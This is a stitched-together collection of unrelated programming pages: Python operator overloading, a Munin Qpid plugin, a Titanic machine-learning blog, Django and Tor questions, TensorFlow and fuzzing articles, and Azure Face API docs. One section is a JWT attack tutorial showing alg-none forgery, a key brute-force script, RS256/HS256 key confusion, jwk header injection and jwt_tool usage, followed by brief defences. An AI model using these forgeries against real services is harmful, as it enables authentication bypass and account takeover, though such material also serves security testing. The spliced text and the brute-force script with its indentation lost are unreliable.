Python does not limit overloading to arithmetic operators; it also lets you overload comparison operators.
Python supports many comparison operators, for example <, >, <=, >=, ==, ...
You overload these operators when you want to compare objects of a class with one another.
For example, to compare points of the Point class by their distance from the origin, do the following:
class Point:
    def __init__(self, x = 0, y = 0):
        self.x = x
        self.y = y

    def __str__(self):
        return "({0},{1})".format(self.x,self.y)

    def __lt__(self, other):
        self_mag = (self.x ** 2) + (self.y ** 2)
        other_mag = (other.x ** 2) + (other.y ** 2)
        return self_mag < other_mag
We run the program, create some points, and compare them:
>>> Point(1,1) < Point(-2,-3)
True
>>> Point(1,1) < Point(0.5,-0.2)
False
>>> Point(1,1) < Point(1,1)
False
Similarly, you can overload the other comparison operators. The table below lists the special functions used for comparison operator overloading:
Operator Expression Internally
Less than p1 < p2 p1.__lt__(p2)
Less than or equal to p1 <= p2 p1.__le__(p2)
Equal to p1 == p2 p1.__eq__(p2)
Not equal to p1 != p2 p1.__ne__(p2)
Greater than p1 > p2 p1.__gt__(p2)
Greater than or equal to p1 >= p2 p1.__ge__(p2)
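As a quick illustration of the table, here is a minimal sketch adding equality to the same Point class (this example is mine, following the __eq__ row above):

class Point:
    def __init__(self, x = 0, y = 0):
        self.x = x
        self.y = y

    def __eq__(self, other):
        # p1 == p2 calls p1.__eq__(p2)
        return self.x == other.x and self.y == other.y

print(Point(1, 1) == Point(1, 1))  # True
print(Point(1, 1) == Point(2, 3))  # False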
See also:
Operator overloading in C#
Relational operator overloading in C++
Object-oriented programming in Python
Last updated: 2019-11-22 11:59:42
Compared with the traditional session-cookie authentication mechanism, Token Auth is becoming popular: all token state is kept on the client. This article covers one flavour of Token Auth, the JWT mechanism.
A JWT (JSON Web Token) is a JSON-format string that the server signs with a cryptographic algorithm to guarantee its integrity and prevent forgery. The token can carry all the necessary information, so the server does not need to store anything about the user or the session. JWTs can be used for authentication, session state, information exchange, and so on.
A JWT consists of three parts, header, payload and signature, separated by dots, in the form xxx.yyy.zzz.
Here is a concrete token example:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
The header declares the token type and the signing algorithm, and is Base64Url-encoded. For example, the header of the token above base64-decodes to {"alg":"HS256","typ":"JWT"}.
# Base64Url encoding looks like this (Python 2)
from base64 import *

def base64URLen(s):
    t0 = b64encode(s)
    t1 = t0.strip('=').replace('+', '-').replace('/', '_')
    return t1

def base64URLde(s):
    t0 = s.replace('-', '+').replace('_', '/')
    t1 = t0 + '=' * ((4 - len(t0) % 4) % 4)  # restore the stripped padding
    return b64decode(t1)
The payload carries the actual token claims, and is also Base64Url-encoded. For example, the payload of the token above decodes to {"sub":"1234567890","name":"John Doe","iat":1516239022}.
The signature is produced by signing the first two parts with the algorithm named in alg, then Base64Url-encoding the result.
So a decoded JWT contains roughly the header and payload shown above, plus the signature.
When we come across a JWT string, we can usually decode it on https://jwt.io/.
The payload and header are easy to decode, since both are only Base64Url-encoded, and developers sometimes mistakenly store sensitive information in the payload.
Some servers do not verify the JWT signature at all, so it is worth modifying the signature (or simply deleting it) and checking whether the token is still accepted.
The header declares the token type and the signing algorithm, for example:
{
"alg": "HS256",
"typ": "JWT"
}
The header above specifies HS256 as the signing algorithm: the server uses it to sign the header and payload into the signature, and uses the same algorithm to verify the signature when a token arrives.
But what happens if we change the signing algorithm? For example, modify the header to:
{
"alg": "none",
"typ": "JWT"
}
The server will then treat the token as having no signing algorithm at all, so signature verification is skipped and we can freely modify the payload to forge tokens.
https://jwt.io/#debugger treats alg none as malicious, so the online tool refuses to generate such a JWT; it can be done in Python instead, as sketched below.
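A minimal sketch of forging an unsigned token by hand (no signing key is needed, so plain base64 is enough; the claim values here are placeholders):

import base64, json

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
payload = b64url(json.dumps({"login": "admin"}).encode())  # forged claims
print(header + "." + payload + ".")  # empty signature segment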
A JWT generated with the none algorithm effectively has only two parts; there is no signature at all.
JWTs sign the header and payload with a key; if we can brute-force that key, we can modify the token at will.
Here is a Python JWT brute-force script: https://github.com/Ch1ngg/JWTPyCrack
You can also brute-force quickly with the following script:
jwt_str = "xxx.ttt.zzz"
path = "D:/keys.txt"
alg = "HS256"
with open(path,encoding='utf-8') as f:
for line in f:
key_ = line.strip()
try:
jwt.decode(jwt_str,verify=True,key=key_,algorithm=alg)
print('found key! --> ' + key_)
break
except(jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
print('found key! --> ' + key_)
break
except(jwt.exceptions.InvalidSignatureError):
continue
else:
print("key not found!")
JWT signing algorithms come in two families: symmetric and asymmetric.
A symmetric algorithm such as HS256 uses the same key for signing and verification, kept on the server.
An asymmetric algorithm such as RS256 signs with a private key on the server and verifies with a public key, which we can often obtain.
If we change the header algorithm from RS256 to HS256, vulnerable server code will use the RS256 public key as the HS256 secret, so we can forge data using that public key.
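A sketch of that key-confusion forgery, assuming the vulnerable server feeds the raw bytes of its PEM public key into the HMAC check (the exact key bytes used vary between implementations, and "public.pem" and the claims are placeholders):

import base64, hashlib, hmac, json

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

public_key = open("public.pem", "rb").read()  # the server's RSA public key
header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
payload = b64url(json.dumps({"login": "admin"}).encode())
signing_input = (header + "." + payload).encode()
sig = b64url(hmac.new(public_key, signing_input, hashlib.sha256).digest())
print(header + "." + payload + "." + sig)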
jwk is a header parameter that describes the key, and it can be forged. See CVE-2018-0114: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0114
An attacker can forge a JWT as follows: delete the original signature, add a new public key to the header, and sign the token with the private key associated with that public key.
For example:
{
"typ": "JWT",
"alg": "RS256",
"jwk": {
"kty": "RSA",
"kid": "TEST",
"use": "sig",
"e": "AQAB",
"n": "oUGnPChFQAN1xdA1_f_FWZdFAis64o5hdVyFm4vVFBzTIEdYmZZ3hJHsWi5b_m_tjsgjhCZZnPOLn-ZVYs7pce__rDsRw9gfKGCVzvGYvPY1hkIENNeBfSaQlBhOhaRxA85rBkg8BX7zfMRQJ0fMG3EAZhYbr3LDtygwSXi66CCk4zfFNQfOQEF-Tgv1kgdTFJW-r3AKSQayER8kF3xfMuI7-VkKz-yyLDZgITyW2VWmjsvdQTvQflapS1_k9IeTjzxuKCMvAl8v_TFj2bnU5bDJBEhqisdb2BRHMgzzEBX43jc-IHZGSHY2KA39Tr42DVv7gS--2tyh8JluonjpdQ"
}
}
This tool can be used to test the security of a JWT; it lives at https://github.com/ticarpi/jwt_tool
Example usage:
λ python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po
$$$$$\ $$\ $$\ $$$$$$$$\ $$$$$$$$\ $$\
\__$$ |$$ | $\ $$ |\__$$ __| \__$$ __| $$ |
$$ |$$ |$$$\ $$ | $$ | $$ | $$$$$$\ $$$$$$\ $$ |
$$ |$$ $$ $$\$$ | $$ | $$ |$$ __$$\ $$ __$$\ $$ |
$$\ $$ |$$$$ _$$$$ | $$ | $$ |$$ / $$ |$$ / $$ |$$ |
$$ | $$ |$$$ / \$$$ | $$ | $$ |$$ | $$ |$$ | $$ |$$ |
\$$$$$$ |$$ / \$$ | $$ | $$ |\$$$$$$ |\$$$$$$ |$$ |
\______/ \__/ \__| \__|$$$$$$\__| \______/ \______/ \__|
Version 1.3 \______|
=====================
Decoded Token Values:
=====================
Token header values:
[+] typ = JWT
[+] alg = HS256
Token payload values:
[+] login = ticarpi
----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------
########################################################
# Options: #
# ==== TAMPERING ==== #
# 1: Tamper with JWT data (multiple signing options) #
# #
# ==== VULNERABILITIES ==== #
# 2: Check for the "none" algorithm vulnerability #
# 3: Check for HS/RSA key confusion vulnerability #
# 4: Check for JWKS key injection vulnerability #
# #
# ==== CRACKING/GUESSING ==== #
# 5: Check HS signature against a key (password) #
# 6: Check HS signature against key file #
# 7: Crack signature with supplied dictionary file #
# #
# ==== RSA KEY FUNCTIONS ==== #
# 8: Verify RSA signature against a Public Key #
# #
# 0: Quit #
########################################################
Please make a selection (1-6)
> 1
The menu options are:
1. Tamper with the JWT
2. Generate a JWT with the none algorithm
3. Check for the RS/HS256 public key confusion vulnerability
4. Check whether the JKU key can be forged
5. Enter a key and check whether it is correct
6. Enter a file containing keys and check whether any is correct
7. Enter a dictionary file and brute-force the signature
8. Enter an RSA public key and check whether it is correct
In general, guaranteeing the first two points below already rules out most of these vulnerabilities:
Keep the signing key secret
Fix the signature algorithm on the server side; never trust the algorithm named inside the JWT
Avoid storing sensitive information in the JWT
Keep the JWT's validity period as short as possible
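For the second point, a minimal sketch with PyJWT that pins the algorithm server-side instead of trusting the token header (the key and token here are placeholders):

import jwt  # PyJWT

SECRET = "server-side-secret"  # placeholder for the real HS256 key
token = "xxx.yyy.zzz"          # token received from the client
# algorithms=["HS256"] pins the algorithm: tokens claiming alg none or RS256 are rejected
claims = jwt.decode(token, key=SECRET, algorithms=["HS256"])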
qpid_discardsring
Sadly there is no documentation for this plugin.
#!/usr/bin/env python
#
# Plugin to monitor Apache Qpid
# - graphs the number of messages discarded from queue(s) specified in config
#
# Parameters understood:
#
# queues (required) - space separated list of queues to display (regex allowed)
#
# Made by Jimmy Jones (jimmyjones2 AT gmx DOT co DOT uk)
#
# Licence: GPLv2
#
import re
import sys
import os

from qmf.console import Session

if "queues" not in os.environ:
    print >> sys.stderr, "Missing env.queues in config"
    sys.exit(-1)

output_queue = []

sess = Session()
broker = sess.addBroker()
queues = sess.getObjects(_class="queue", _package="org.apache.qpid.broker")

for q in queues:
    for match in os.environ["queues"].split(" "):
        if re.match(match, q.name):
            output_queue.append(re.sub('[^a-zA-Z0-9_]', '_', q.name))

if len(sys.argv) > 1 and sys.argv[1] == "config":
    print "graph_category webserver"
    print "graph_title Ring queue discard rate"
    print "graph_vlabel messages/second"
    for queue in output_queue:
        print "%s.label %s" % (queue, queue)
        print "%s.min 0" % queue
        print "%s.type COUNTER" % queue
else:
    for q in queues:
        qname = re.sub('[^a-zA-Z0-9_]', '_', q.name)
        if qname in output_queue:
            print "%s.value %u" % (qname, q.discardsRing)

sess.delBroker(broker)
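Although undocumented, a plugin like this is normally driven through Munin's per-plugin environment configuration. A hypothetical example (the queue names are made up) matching the required "queues" parameter above:
[qpid_discardsring]
env.queues orders-queue audit-.*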
|
Firstly, the title is a joke. I really have no helpful insights to share as you’ll see from my work.
This will be split into a few sections
What is machine learning?
Train and test data
Visualising the training data
Creating a feature
Cleaning the data
Converting the data
Testing predictions with the test data
Final thoughts
It should definitely be mentioned that this is the furthest thing from a tutorial you will ever witness. I’m not writing to teach but to learn and tell bad jokes.
If you want a helpful tutorial (one that helped me along), follow Titanic – Data Science Solutions on Kaggle.
What is Machine Learning?
One of the basic tasks in machine learning is classification. You want to predict something as either "A will happen" or "B will happen". You can do this using historical data and by selecting algorithms that best fit the purpose.
The problem we are posed with is:
Knowing from a training set of samples listing passengers who survived or did not survive the Titanic disaster, can our model determine based on a given test dataset not containing the survival information, if these passengers in the test dataset survived or not.
Kaggle – Machine Learning From Disaster
2. Train and Test data
Kaggle, the data science website, has a beginner problem called "Titanic – Machine Learning from Disaster" where you're given data about who survived the Titanic disaster, with information about their age, name, number of siblings and so on. You're then asked to predict the outcome for around 400 people.
The original table looks something like this:
PassengerId Survived Pclass Name Sex Age SibSp Parch Ticket Fare Cabin Embarked
1 0 3 Braund, Mr. Owen Harris male 22.0 1 0 A/5 21171 7.2500 NaN S
2 1 1 Cumings, Mrs. John Bradley (Florence Briggs Th… female 38.0 1 0 PC 17599 71.2833 C85 C
3 1 3 Heikkinen, Miss. Laina female 26.0 0 0 STON/O2. 3101282 7.9250 NaN S
4 1 1 Futrelle, Mrs. Jacques Heath (Lily May Peel) female 35.0 1 0 113803 53.1000 C123 S
5 0 3 Allen, Mr. William Henry male 35.0 0 0 373450 8.0500 NaN S
This is what we call "training data". It is information we know the outcome for, and we use it to fit our algorithms before making predictions.
There is also “test” data. It is similar to the data above but with the survived column removed. We will use this to check our predictions against and see how well our efforts have done with all of the visualisations and algorithm abuse we’re doing.
3. Visualising the data
To start with, it’s important to simply have a look at the data to see what insights we can gather from a birds eye view. Otherwise we’re just staring at tables and then hoping for the best.
I won’t go through everything (and yes, it is very rough) but we can gain some basic insights from this. It might influence whether we want to create any new features or focus on certain features when trying to predict survival rates.
For example, we can see from the box plots that most people were roughly 30 years old and had one sibling on board (2nd row, first two box plots). From the histograms, we can see that most people were in passenger class 3 (we have no idea what that means in real life) and a lot of people on the titanic (at least in this dataset) were pretty young.
How does this impact survival? I’m glad you asked. Let’s look at some more graphs.
Now, we could just make predictions based off these factors if we really wanted to. However, we can also create features based on the information that we have. This is called feature engineering.
4. Creating a feature
I know, this seems like I’m playing God with data. In part, that is why I’m doing this. To feel something.
We have their names with their titles included. We can extract the titles and create a feature called "Title". With this, we'll also be able to distinguish whether people with fancy titles, or married women, and so on, were saved first.
for dataset in new_combined:
    dataset['Title'] = dataset.Name.str.extract(r' ([A-Za-z]+)\.', expand=False)
You don’t need to understand everything or the variables here. They are specific to the code written which is found on my GitHub.
It basically takes the name "Braund, Mr. Owen Harris" and looks for a run of letters (A-Za-z) followed by a dot. When this code runs, it pulls out "Mr" because it fits that pattern (the dot is matched but sits outside the capturing group). If the title were written without the dot, say "mr", the code would miss it and ignore the name. It's great, and I'll definitely be using str.extract again.
5. Cleaning the data
A lot of data is bad. Data can regularly contain missing values, mistakes, or simply be remarkably unhelpful for our goals. I've been told that this is a large part of the workflow when trying to solve problems that require prediction.
We can get this information pretty quickly:
new_combined.info() #This tells us all the non-null values in the data set
new_combined.isna().sum() #This tells us which rows have null values (it's quicker than the first method)
In the titanic data set, we have loads of missing data in the “age” column and a small amount in the “embarked” column.
For the “age” section, I followed the advice from the tutorial linked above and guessed the ages based on their passenger class, and sex.
For the “embarked” section, because there were so few missing values, I filled them in using the most common location someone embarked on.
As you can see, cleaning data requires some assumptions to be made and can utilise different techniques. It is definitely something to keep in mind as datasets get bigger and messier. The dataset I’m working with is actually pretty good which is likely a luxury.
It isn’t sexy but important. I suppose that’s the case with many things in life.
6. Converting the data
In order for this information to be useful to an algorithm, we need to make sure that the information in our table is numerical.
We can do this by mapping groups of information to numbers. I did this for all features.
It basically follows this format:
for item in new_combined:
item.Sex = item.Sex.map({"male":0, "female":1}).astype(int)
It is important to note that this only works if all of the info is filled in (which is why the previous step is so important).
For features that have a large number of entries (for example, “age” could potentially have 891 unique values), we can group them together so we have a smaller number of numerical values. This is the same for “fare” and the “title” feature created earlier.
It is basically the same as above but there is one prior step – creating the bands! It is simply using the “pd.cut()” feature. This segments whichever column we specify into the number of bands we want. Then we use those bands and say something like:
“If this passenger is between the age of 0 and 16, we’ll assign them a “1”.”
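As a sketch of that banding step (assuming pandas and that new_combined holds DataFrames with a numeric 'Age' column; the band edges here are illustrative, not necessarily the ones I used):
import pandas as pd

for dataset in new_combined:
    # Five age bands, encoded as the integers 0-4.
    dataset['Age'] = pd.cut(dataset['Age'], bins=[0, 16, 32, 48, 64, 80], labels=False)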
Our final table will look like this:
Survived Pclass Sex Age SibSp Parch Fare Embarked Title
0 3 0 1 1 0 0.0 1 3
1 1 1 2 1 0 3.0 3 4
1 3 1 1 0 0 1.0 1 2
1 1 1 2 1 0 3.0 1 4
0 3 0 2 0 0 1.0 1 3
7. Testing predictions with the test data
Now we have a table prepared for our predictions, we can select algorithms, fit them to our training data, then make a prediction.
While the previous stages were definitely frustrating to wrap my head around, this section certainly exposed just how much more there is to learn! Exciting but somewhat demoralising.
There are multiple models you can use to create predictions and there are also multiple ways to test whether what you have done is accurate.
So again, this is not a tutorial. Just an exposé of my poor ability.
Funnily enough, I also think this is where it went wrong. My predictions don’t really make any sense.
To set the scene – we have:
A table of features we’ll use to make a prediction (the above table) = X
A prediction target (the “survived” column) = y
We can split our data into 4 sections and it looks like so:
train_X, val_X, train_y, val_y = train_test_split(X, y, random_state = 0)
This splits our data into the four variables I've specified. random_state=0 just means we get the same data split every time the script is run (i.e. the split isn't re-randomised on each run).
Now we can define our models. I picked a variety of different models to see what results I would get and will hopefully be able to explain the models in another post. However, a detailed understanding of them isn’t necessary at the moment.
I used two linear models and four non-linear models. The most accurate model I used was “SVC” or Support Vector Classification.
SVM = SVC(gamma='auto')  # Defines the model
SVM.fit(train_X.drop(["Survived"], axis=1), train_y)  # Allows the model to "learn" from the data we have provided
Y_prediction = SVM.predict(test_X.drop(["PassengerId"], axis=1))  # Predicts the values that should be in the "Survived" column
acc_log = round(SVM.score(train_X.drop(["Survived"], axis=1), train_y) * 100, 2)  # Returns the mean accuracy based on the labels provided
acc_log  # Returns the accuracy as a percentage
My final result was 83.7% accuracy!
My first attempt led me to a 99.7% accuracy – Ain’t no way! And the kicker? It predicted everyone would die!
At this point, my brain rightfully died and I submitted my prediction to the Kaggle competition with it being better than 77% of other users. So there is much room for improvement.
8. Final thoughts
This is a beginner problem designed to help people get used to the basics of machine learning so the dataset is better than you’d usually get in the real world.
As I was working through this, I noticed that there are a lot of decisions we can make when creating a prediction. It sounds obvious but it’s important. This is where normal cognitive biases creep in which can go unnoticed – especially when the information we’re working with is far more complex and less complete.
For example, if any of the features were less complete, our choices about how to fill them in would have a greater impact on the results. The algorithms we choose are never a one-size-fits-all solution (which is why we often test many).
I’ll publish my code on my GitHub page when I’ve cleaned it up slightly and removed the swear words.
I’ve probably made a really dumb mistake somewhere so if you feel like looking at the code, please do let me know what that might be…
And with that, I bring it to an end.
There will be much more to improve and learn but I’m glad I’ve given this a shot.
Recent Data Science Somedays posts
|
I use the code from the documentation to paginate the data:
try:
    data = paginator.page(request.GET.get('page'))
except PageNotAnInteger:
    page = 1
    data = paginator.page(1)
except EmptyPage:
    data = paginator.page(paginator.num_pages)
And a page:
<div class="pagination">
<span class="step-links">
{% if data.has_previous %}
<a href="?page={{ data.previous_page_number }}">previous</a>
{% endif %}
<span class="current">
<b>Page</b> {{ data.number }} of {{ data.paginator.num_pages }}
</span>
{% if data.has_next %}
<a href="?page={{ data.next_page_number }}">next</a>
{% endif %}
</span>
</div>
But there's a bug here: when the url contains a query string and one clicks on the Pager, the original query string gets lost. For example:
example.com?var1=33&var2=44
and then when one clicks on "page2", the url becomes
example.com?page=2 # var1=33&var2=44 is lost
instead of:
example.com?var1=33&var2=44&page=2
I haven't found either a standard or an easy way to fix it. How can I do that?
UPDATE:
Of course, the names of the parameters, their values, and whether they exist at all are not known in advance.
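For reference, one widely used approach (a sketch, not the only way, and url_replace is a made-up name) is a small template tag that re-encodes the current query string with the page number overridden:
from django import template

register = template.Library()

@register.simple_tag(takes_context=True)
def url_replace(context, **kwargs):
    # Copy the current GET parameters and override the given ones.
    query = context['request'].GET.copy()
    for key, value in kwargs.items():
        query[key] = value
    return query.urlencode()

The pager link then becomes <a href="?{% url_replace page=data.next_page_number %}">next</a>, which keeps var1 and var2 intact (this assumes the request context processor is enabled).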
|
I can get the current circuits with this stem code.
#!/usr/bin/env python
from stem import CircStatus
from stem.control import Controller

with Controller.from_port(port=9051) as controller:
    controller.authenticate()
    for circ in sorted(controller.get_circuits()):
        if circ.status != CircStatus.BUILT:
            continue
        print("Circuit %s" % (circ.id))
How would you list all tor circuits that have ever been established from the moment that tor has been started?
To make things clear: instead of listing only the current circuits (say number 7), I want to list all circuits.
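For reference, a hedged sketch of one way to do this with stem (not from the question): subscribe to CIRC events so every circuit is recorded as it is built, instead of polling get_circuits().
from stem import CircStatus
from stem.control import Controller, EventType

seen = {}

def on_circ(event):
    # Record each circuit the first time it reaches the BUILT state.
    if event.status == CircStatus.BUILT:
        seen[event.id] = [fingerprint for fingerprint, nickname in event.path]

with Controller.from_port(port=9051) as controller:
    controller.authenticate()
    controller.add_event_listener(on_circ, EventType.CIRC)
    input("Listening for circuits; press Enter to stop...")
    for circ_id, path in sorted(seen.items()):
        print("Circuit %s: %s" % (circ_id, ", ".join(path)))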
|
March 11, 2020 — Posted by Guest author Hannes Hapke, Senior Machine Learning Engineer at SAP's Concur Labs. Edited by Robert Crowe on behalf of the TFX team.
Transformer models, especially the BERT model, have revolutionized NLP and broken new ground on tasks such as sentiment analysis, entity extractions, or question-answer problems. BERT models allow data scientists to stand on the shoulders of giants. When th…
Figure 1: Current BERT deployments
Figure 2: TFX pipeline with tf.Text
vocab_file_path = load_bert_layer().resolved_object.vocab_file.asset_path
bert_tokenizer = text.BertTokenizer(vocab_lookup_table=vocab_file_path,
                                    token_out_type=tf.int64,
                                    lower_case=do_lower_case)
...
input_word_ids = tokenize_text(text)
input_mask = tf.cast(input_word_ids > 0, tf.int64)
input_mask = tf.reshape(input_mask, [-1, MAX_SEQ_LEN])

zeros_dims = tf.stack(tf.shape(input_mask))
input_type_ids = tf.fill(zeros_dims, 0)
input_type_ids = tf.cast(input_type_ids, tf.int64)
Figure 3: BERT tokenizer
Figure 4: BERT layer
|
Google recently announced the open-sourcing of a new fuzz-testing engine for Python. The new fuzzer, Atheris, strives to find bugs in Python code and native extensions in Python 2.7 and Python 3.3+. Atheris can be used in combination with the Address Sanitizer and Undefined Behavior Sanitizer tools that detect memory corruption bugs and undefined behavior (e.g., buffer overflows, misaligned or null pointers).
Google explained the value that Atheris seeks to add to the current space of fuzzing engines:
Fuzz testing is a well-known technique for uncovering programming errors. Many of these detectable errors have serious security implications. Google has found thousands of security vulnerabilities and other bugs using this technique. Fuzzing is traditionally used on native languages such as C or C++, but last year, we built a new Python fuzzing engine.
Atheris can be used on Python code (Python 2.7 and Python 3.3+, with Python 3.8+ strongly recommended for better code coverage support) and native extensions written for CPython. When fuzzing native code, Atheris can be used in combination with Clang’s Address Sanitizer or Undefined Behavior Sanitizer to catch extra bugs.
An example of Python code fuzzing is as follows:
import atheris
import sys

def TestOneInput(data):
    if data == b"bad":
        raise RuntimeError("Badness!")

atheris.Setup(sys.argv, TestOneInput)
atheris.Fuzz()
TestOneInput is the function under test. It will be called repeatedly by Atheris with automatically generated inputs until a crash or an exception occurs.
The function admits one input (data) that is a bytes container. Atheris provides a FuzzedDataProvider that supports fuzzing with additional input shapes (e.g., string, list, integers, floats, intervals). Atheris can be used with the property-based testing tool Hypothesis to write fuzz harnesses, and shrink an input causing a malfunction to a smaller reproducible failure case. Hypothesis additionally provides advanced input-generation strategies (e.g., email, dictionaries, dates, regexp) that complement Atheris’ fuzzed data provider.
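For illustration, a minimal sketch of a harness built on FuzzedDataProvider (the Consume* methods below are part of Atheris' documented API; the property being checked is invented for the example):
import sys
import atheris

def TestOneInput(data):
    fdp = atheris.FuzzedDataProvider(data)
    text = fdp.ConsumeUnicodeNoSurrogates(16)   # up to 16 characters of text
    count = fdp.ConsumeIntInRange(0, 100)
    # Hypothetical property under test: repetition preserves the separator count.
    assert ((text.replace(",", "") + ",") * count).count(",") == count

atheris.Setup(sys.argv, TestOneInput)
atheris.Fuzz()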
Atheris is a coverage-guided (grey-box) fuzzing engine. Atheris leverages Clang’s libFuzzer to instrument the code under test and collect coverage information. Atheris then dynamically tries to generate inputs that increase the code coverage generated by previous input sequences.
While Atheris takes care of test-case generation and test execution, the onus is on the programmer to recognize erroneous behaviors of the function under test. This may be achieved by using cross-referencing oracles (differential fuzzing). In this method, as with more generic metamorphic testing methods, two implementations of the same specification are run on the same input, and differences in results are singled out for analysis.
If a test oracle or metamorphic property is not available, programmers can still use fuzzing to detect malfunctions. This is the case when the function under test raises unexpected exceptions or fails a fault-detection mechanism.
Google gives the following example of the usefulness of checking for unexpected exceptions:
As an example, the one YAML parsing library we tested Atheris on says that it will only raise YAMLErrors; however, yaml_fuzzer.py detects numerous other exceptions, such as ValueError from trying to interpret “-_” as an integer, or TypeError from trying to use a list as a key in a dict. (Bug report.) This indicates flaws in the parser.
Differential fuzzing and fuzz testing are powerful automated testing techniques that have found many bugs in existing software — C compilers, Java decompilers, antivirus software, and more. Nick Fitzgerald recently explained in an InfoQ interview how generative testing allows finding bugs that are not easy to detect with other methods:
There’s a ton that we miss with basic unit testing, where we write out some fixed set of inputs and assert that our program produces the expected output. We overlook some code paths or we fail to exercise certain program states. […]
Testing pseudo-random inputs helps us avoid our own biases by feeding our system “unexpected” inputs. It helps us find integer overflow bugs or pathological inputs that allow (untrusted and potentially hostile) users to trigger out-of-memory bugs or timeouts that could be leveraged as part of a denial of service attack.
Fitzgerald reported finding bugs in the wasmparser crate’s validator. Google recently reported that 50 interns who participated in Google’s OSS internship initiative reported over 150 security vulnerabilities and 750 functional bugs.
|
March 30, 2018 — Posted by Josh Gordon, Developer Advocate for TensorFlow
One of the things that’s so fundamental in software development that it’s easy to overlook is the idea of a repository of shared code. As programmers, libraries immediately make us more effective. In a sense, they change the problem solving process of programming. When using a library, we often think of programming in terms of building bloc…
"Ingredients" of a machine learning model that can be packaged and shared through TensorFlow Hub. In a sense, sharing a pre-trained model also shares the compute time and dataset used to develop the model, in addition to architecture itself.
# Download and use NASNet feature vector module.
module = hub.Module(
    "https://tfhub.dev/google/imagenet/nasnet_large/feature_vector/1")
features = module(my_images)
logits = tf.layers.dense(features, NUM_CLASSES)
probabilities = tf.nn.softmax(logits)
The basic idea is to reuse an existing image recognition module to extract features from your images, and then train a new classifier on top of these. As you can see above, TensorFlow Hub modules can be instantiated from a URL (or, from a filesystem path) while a TensorFlow graph is being constructed. There are a variety of modules on TensorFlow Hub for you to choose from, including various flavors of NASNet, MobileNet (including its recent V2), Inception, ResNet, and others. To use a module, you import TensorFlow Hub, then copy/paste the module's URL into your code.
Some of the image modules available on TensorFlow Hub.
# Download a module and use it to retrieve word embeddings.
embed = hub.Module("https://tfhub.dev/google/nnlm-en-dim50/1")
embeddings = embed(["The movie was great!"])
As before, we start by selecting a module. TensorFlow Hub has a variety of text modules for you to explore, including Neural network language models in a variety of languages (EN, JP, DE, and ES), as well as Word2vec trained on Wikipedia, and NNLM embeddings trained on Google News.
Some of the text modules shared on TensorFlow Hub.
A text classification tutorial using TensorFlow Hub.
This notebook shows how to train a simple binary text classifier on top of any TF-Hub module that can embed sentences.
# Use pre-trained universal sentence encoder to build text vector
review = hub.text_embedding_column(
    "review", "https://tfhub.dev/google/universal-sentence-encoder/1")

features = {
    "review": np.array(["this movie is a masterpiece", "this movie was terrible", …])
}
labels = np.array([[1], [0], …])
input_fn = tf.estimator.inputs.numpy_input_fn(features, labels, shuffle=True)
estimator = tf.estimator.DNNClassifier(hidden_units, [review])
estimator.train(input_fn, max_steps=100)
Check out this tutorial to learn more.
|
Face API - v1.0
This API is currently available in:
Australia East - australiaeast.api.cognitive.microsoft.com
Brazil South - brazilsouth.api.cognitive.microsoft.com
Canada Central - canadacentral.api.cognitive.microsoft.com
Central India - centralindia.api.cognitive.microsoft.com
Central US - centralus.api.cognitive.microsoft.com
East Asia - eastasia.api.cognitive.microsoft.com
East US - eastus.api.cognitive.microsoft.com
East US 2 - eastus2.api.cognitive.microsoft.com
France Central - francecentral.api.cognitive.microsoft.com
Japan East - japaneast.api.cognitive.microsoft.com
Japan West - japanwest.api.cognitive.microsoft.com
Korea Central - koreacentral.api.cognitive.microsoft.com
North Central US - northcentralus.api.cognitive.microsoft.com
North Europe - northeurope.api.cognitive.microsoft.com
South Africa North - southafricanorth.api.cognitive.microsoft.com
South Central US - southcentralus.api.cognitive.microsoft.com
Southeast Asia - southeastasia.api.cognitive.microsoft.com
UK South - uksouth.api.cognitive.microsoft.com
West Central US - westcentralus.api.cognitive.microsoft.com
West Europe - westeurope.api.cognitive.microsoft.com
West US - westus.api.cognitive.microsoft.com
West US 2 - westus2.api.cognitive.microsoft.com
UAE North - uaenorth.api.cognitive.microsoft.com
FaceList - Add Face
Add a face to a specified face list, up to 1,000 faces.
To deal with an image containing multiple faces, the input face can be specified as an image with a targetFace rectangle. It returns a persistedFaceId representing the added face. No image will be stored: only the extracted face feature(s) will be stored on the server until FaceList - Delete Face or FaceList - Delete is called.
Note: persistedFaceId is different from the faceId generated by Face - Detect.
Higher face image quality means better detection and recognition precision. Please consider high-quality faces: frontal, clear, and face size is 200x200 pixels (100 pixels between eyes) or bigger.
JPEG, PNG, GIF (the first frame), and BMP format are supported. The allowed image file size is from 1KB to 6MB.
"targetFace" rectangle should contain one face. Zero or multiple faces will be regarded as an error. If the provided "targetFace" rectangle is not returned from Face - Detect, there’s no guarantee to detect and add the face successfully.
Faces outside the detectable size range (36x36 to 4096x4096 pixels), large head poses, or large occlusions will cause failures.
Adding/deleting faces to/from the same face list is processed sequentially; operations on different face lists run in parallel.
The minimum detectable face size is 36x36 pixels in an image no larger than 1920x1080 pixels. Images with dimensions higher than 1920x1080 pixels will need a proportionally larger minimum face size.
Different 'detectionModel' values can be provided. To use and compare different detection models, please refer to How to specify a detection model
'detection_01': The default detection model for FaceList - Add Face. Recommended for near-frontal face detection. Faces may not be detected in scenarios with exceptionally large head-pose angles, occluded faces, or wrong image orientation.
'detection_02': Detection model released in May 2019, with improved accuracy especially on small, side-view and blurry faces.
Http Method
POST
Request URL
Request parameters
faceListId: Valid characters are lower-case letters, digits, '-' and '_'; the maximum length is 64.
userData: User-specified data about the face list for any purpose. The maximum length is 1KB.
